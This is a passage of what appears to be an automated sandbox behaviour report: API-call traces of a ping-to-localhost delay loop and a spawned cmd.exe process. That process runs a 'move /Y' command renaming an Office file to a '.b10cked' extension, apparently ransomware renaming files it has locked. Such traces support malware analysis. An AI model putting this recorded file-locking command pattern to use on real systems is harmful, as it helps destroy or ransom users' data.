pSockaddr=0x3355e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x20f754, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0176.790] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x20f258, nSize=0x0, Arguments=0x20f254 | out: lpBuffer=" Q@") returned 0x10 [0176.790] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x405120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0176.790] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0176.790] _write (in: _FileHandle=1, _Buf=0x405120*, _MaxCharCount=0x10 | out: 
_Buf=0x405120*) returned 16 [0176.790] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0176.790] LocalFree (hMem=0x405120) returned 0x0 [0176.790] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x20f25c, nSize=0x0, Arguments=0x20f258 | out: lpBuffer="\x10<@") returned 0x9 [0176.790] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x403c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0176.791] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0176.791] _write (in: _FileHandle=1, _Buf=0x403c10*, _MaxCharCount=0x9 | out: _Buf=0x403c10*) returned 9 [0176.791] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0176.791] LocalFree (hMem=0x403c10) returned 0x0 [0176.791] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x20f25c, nSize=0x0, Arguments=0x20f258 | out: lpBuffer=" \x8f@") returned 0x2 [0176.791] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x408f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0176.791] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0176.791] _write (in: _FileHandle=1, _Buf=0x408f20*, _MaxCharCount=0x2 | out: _Buf=0x408f20*) returned 2 [0176.791] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0176.791] LocalFree (hMem=0x408f20) returned 0x0 [0176.791] Sleep (dwMilliseconds=0x3e8) [0177.933] Icmp6SendEcho2 (in: IcmpHandle=0x408b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x20f2d0, DestinationAddress=0x3355e0, RequestData=0x404830, RequestSize=0x20, RequestOptions=0x20f280, ReplyBuffer=0x40ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x40ebb0) returned 0x1 [0178.043] getnameinfo (in: pSockaddr=0x3355e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x20f754, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", 
pServiceBuffer=0x0) returned 0 [0178.043] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x20f258, nSize=0x0, Arguments=0x20f254 | out: lpBuffer=" Q@") returned 0x10 [0178.043] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x405120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0178.043] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0178.044] _write (in: _FileHandle=1, _Buf=0x405120*, _MaxCharCount=0x10 | out: _Buf=0x405120*) returned 16 [0178.044] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0178.044] LocalFree (hMem=0x405120) returned 0x0 [0178.044] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x20f25c, nSize=0x0, Arguments=0x20f258 | out: lpBuffer="\x10<@") returned 0x9 [0178.044] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x403c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0178.044] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0178.044] _write (in: _FileHandle=1, _Buf=0x403c10*, _MaxCharCount=0x9 | out: _Buf=0x403c10*) returned 9 [0178.044] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0178.044] LocalFree (hMem=0x403c10) returned 0x0 [0178.044] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x20f25c, nSize=0x0, Arguments=0x20f258 | out: lpBuffer=" \x8f@") returned 0x2 [0178.044] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x408f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0178.044] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0178.044] _write (in: _FileHandle=1, _Buf=0x408f20*, _MaxCharCount=0x2 | out: _Buf=0x408f20*) returned 2 [0178.044] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0178.044] LocalFree (hMem=0x408f20) returned 0x0 [0178.044] getnameinfo (in: pSockaddr=0x3355e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), 
SockaddrLength=0x1c, pNodeBuffer=0x20f220, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0178.044] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x20f1f0, nSize=0x0, Arguments=0x20f1ec | out: lpBuffer="\xd0\x0c\x41") returned 0x56 [0178.045] CharToOemBuffA (in: lpszSrc="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpszDst=0x410cd0, cchDstLength=0x56 | out: lpszDst="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n") returned 1 [0178.045] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0178.045] _write (in: _FileHandle=1, _Buf=0x410cd0*, _MaxCharCount=0x56 | out: _Buf=0x410cd0*) returned 86 [0178.045] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0178.045] LocalFree (hMem=0x410cd0) returned 0x0 [0178.045] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x20f200, nSize=0x0, Arguments=0x20f1fc | out: lpBuffer="\xe8\x0c\x41") returned 0x61 [0178.045] CharToOemBuffA (in: lpszSrc="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpszDst=0x410ce8, cchDstLength=0x61 | out: lpszDst="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n") returned 1 [0178.045] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0178.045] _write (in: _FileHandle=1, _Buf=0x410ce8*, _MaxCharCount=0x61 | out: _Buf=0x410ce8*) returned 97 [0178.045] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0178.045] LocalFree (hMem=0x410ce8) returned 0x0 [0178.045] IcmpCloseHandle (IcmpHandle=0x408b40) returned 1 [0178.163] LocalFree (hMem=0x404830) returned 0x0 [0178.163] LocalFree (hMem=0x40ebb0) returned 0x0 [0178.163] WSACleanup () returned 0 [0178.346] exit (_Code=0) Thread: id = 418 os_tid = 0xa38 Thread: id = 419 os_tid 
= 0xb24 Thread: id = 420 os_tid = 0xbe0 Process: id = "315" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0xa88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24375 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24376 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24377 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24378 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 24379 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 24380 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: 
"c:\\windows\\system32\\ntdll.dll") Region: id = 24381 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24382 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24383 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 24384 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24433 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24434 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24435 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24436 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 24437 start_va = 0x580000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 24438 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 24439 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: 
"c:\\windows\\system32\\kernelbase.dll") Region: id = 24440 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24441 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24442 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24443 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24444 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24445 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24446 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24447 start_va = 0x200000 end_va = 0x2c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 24448 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24449 start_va = 0x76ca0000 end_va = 0x76d6bfff 
entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 24450 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 24451 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 24452 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 24453 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 24454 start_va = 0x400000 end_va = 0x500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 24455 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 24456 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 422 os_tid = 0xb0c [0176.870] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f93c | out: lpSystemTimeAsFileTime=0x18f93c*(dwLowDateTime=0x9f3636c0, dwHighDateTime=0x1d440a9)) [0176.870] GetCurrentProcessId () returned 0xa88 [0176.870] GetCurrentThreadId () returned 0xb0c [0176.870] GetTickCount () returned 0x334a6 [0176.870] QueryPerformanceCounter (in: lpPerformanceCount=0x18f934 | out: lpPerformanceCount=0x18f934*=23365899605) returned 1 [0176.870] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0176.871] __set_app_type (_Type=0x1) [0176.871] __p__fmode () returned 0x76b331f4 [0176.871] __p__commode () returned 0x76b331fc [0176.871] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0176.871] 
__getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0176.871] GetCurrentThreadId () returned 0xb0c [0176.871] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb0c) returned 0x38 [0176.871] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0176.871] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0176.871] SetThreadUILanguage (LangId=0x0) returned 0x409 [0176.871] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0176.871] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f8cc | out: phkResult=0x18f8cc*=0x0) returned 0x2 [0176.872] VirtualQuery (in: lpAddress=0x18f903, lpBuffer=0x18f89c, dwLength=0x1c | out: lpBuffer=0x18f89c*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0176.872] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f89c, dwLength=0x1c | out: lpBuffer=0x18f89c*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0176.872] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f89c, dwLength=0x1c | out: lpBuffer=0x18f89c*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0176.872] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f89c, dwLength=0x1c | out: lpBuffer=0x18f89c*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0176.872] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f89c, dwLength=0x1c | out: 
lpBuffer=0x18f89c*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0176.872] GetConsoleOutputCP () returned 0x1b5 [0176.872] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0176.872] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0176.872] _get_osfhandle (_FileHandle=1) returned 0x7 [0176.872] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0176.872] _get_osfhandle (_FileHandle=1) returned 0x7 [0176.872] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0176.872] _get_osfhandle (_FileHandle=1) returned 0x7 [0176.872] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0176.873] _get_osfhandle (_FileHandle=0) returned 0x3 [0176.873] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0176.873] _get_osfhandle (_FileHandle=0) returned 0x3 [0176.873] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0176.873] GetEnvironmentStringsW () returned 0x310218* [0176.873] FreeEnvironmentStringsW (penv=0x310218) returned 1 [0176.873] GetEnvironmentStringsW () returned 0x310218* [0176.873] FreeEnvironmentStringsW (penv=0x310218) returned 1 [0176.873] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e83c | out: phkResult=0x18e83c*=0x40) returned 0x0 [0176.874] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e844, lpData=0x18e848, lpcbData=0x18e840*=0x1000 | out: lpType=0x18e844*=0x0, lpData=0x18e848*=0xa8, lpcbData=0x18e840*=0x1000) returned 0x2 [0176.874] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e844, lpData=0x18e848, lpcbData=0x18e840*=0x1000 | out: lpType=0x18e844*=0x4, lpData=0x18e848*=0x1, lpcbData=0x18e840*=0x4) 
returned 0x0 [0176.874] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e844, lpData=0x18e848, lpcbData=0x18e840*=0x1000 | out: lpType=0x18e844*=0x0, lpData=0x18e848*=0x1, lpcbData=0x18e840*=0x1000) returned 0x2 [0176.874] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e844, lpData=0x18e848, lpcbData=0x18e840*=0x1000 | out: lpType=0x18e844*=0x4, lpData=0x18e848*=0x0, lpcbData=0x18e840*=0x4) returned 0x0 [0176.874] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e844, lpData=0x18e848, lpcbData=0x18e840*=0x1000 | out: lpType=0x18e844*=0x4, lpData=0x18e848*=0x40, lpcbData=0x18e840*=0x4) returned 0x0 [0176.874] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e844, lpData=0x18e848, lpcbData=0x18e840*=0x1000 | out: lpType=0x18e844*=0x4, lpData=0x18e848*=0x40, lpcbData=0x18e840*=0x4) returned 0x0 [0176.874] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e844, lpData=0x18e848, lpcbData=0x18e840*=0x1000 | out: lpType=0x18e844*=0x0, lpData=0x18e848*=0x40, lpcbData=0x18e840*=0x1000) returned 0x2 [0176.874] RegCloseKey (hKey=0x40) returned 0x0 [0176.874] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e83c | out: phkResult=0x18e83c*=0x40) returned 0x0 [0176.874] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e844, lpData=0x18e848, lpcbData=0x18e840*=0x1000 | out: lpType=0x18e844*=0x0, lpData=0x18e848*=0x40, lpcbData=0x18e840*=0x1000) returned 0x2 [0176.874] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e844, lpData=0x18e848, lpcbData=0x18e840*=0x1000 | out: lpType=0x18e844*=0x4, lpData=0x18e848*=0x1, lpcbData=0x18e840*=0x4) returned 0x0 [0176.874] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e844, lpData=0x18e848, lpcbData=0x18e840*=0x1000 | out: lpType=0x18e844*=0x0, lpData=0x18e848*=0x1, lpcbData=0x18e840*=0x1000) returned 0x2 [0176.874] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e844, lpData=0x18e848, lpcbData=0x18e840*=0x1000 | out: lpType=0x18e844*=0x4, lpData=0x18e848*=0x0, lpcbData=0x18e840*=0x4) returned 0x0 [0176.874] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e844, lpData=0x18e848, lpcbData=0x18e840*=0x1000 | out: lpType=0x18e844*=0x4, lpData=0x18e848*=0x9, lpcbData=0x18e840*=0x4) returned 0x0 [0176.874] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e844, lpData=0x18e848, lpcbData=0x18e840*=0x1000 | out: lpType=0x18e844*=0x4, lpData=0x18e848*=0x9, lpcbData=0x18e840*=0x4) returned 0x0 [0176.874] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e844, lpData=0x18e848, lpcbData=0x18e840*=0x1000 | out: lpType=0x18e844*=0x0, lpData=0x18e848*=0x9, lpcbData=0x18e840*=0x1000) returned 0x2 [0176.874] RegCloseKey (hKey=0x40) returned 0x0 [0176.874] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88638c [0176.874] srand (_Seed=0x5b88638c) [0176.874] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll.b10cked\"" [0176.874] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll.b10cked\"" [0176.874] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0176.875] GetModuleFileNameW (in: hModule=0x0, 
lpFilename=0x311978, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0176.875] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0176.875] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0176.875] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0176.875] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0176.875] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0176.875] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0176.875] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0176.875] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0176.875] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0176.875] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0176.875] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0176.875] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0176.875] GetEnvironmentStringsW () returned 0x312368* [0176.875] FreeEnvironmentStringsW (penv=0x312368) returned 1 [0176.875] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0176.875] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0176.875] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0176.875] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0176.875] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0176.875] _wcsicmp (_String1="KEYS", 
_String2="CMDCMDLINE") returned 8 [0176.875] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0176.875] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0176.876] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0176.876] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0176.876] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f608 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0176.876] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f608, lpFilePart=0x18f604 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f604*="Desktop") returned 0x18 [0176.876] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0176.876] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f384 | out: lpFindFileData=0x18f384) returned 0x3109f8 [0176.876] FindClose (in: hFindFile=0x3109f8 | out: hFindFile=0x3109f8) returned 1 [0176.876] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f384 | out: lpFindFileData=0x18f384) returned 0x3109f8 [0176.876] FindClose (in: hFindFile=0x3109f8 | out: hFindFile=0x3109f8) returned 1 [0176.876] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f384 | out: lpFindFileData=0x18f384) returned 0x3109f8 [0176.876] FindClose (in: hFindFile=0x3109f8 | out: hFindFile=0x3109f8) returned 1 [0176.876] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0176.876] 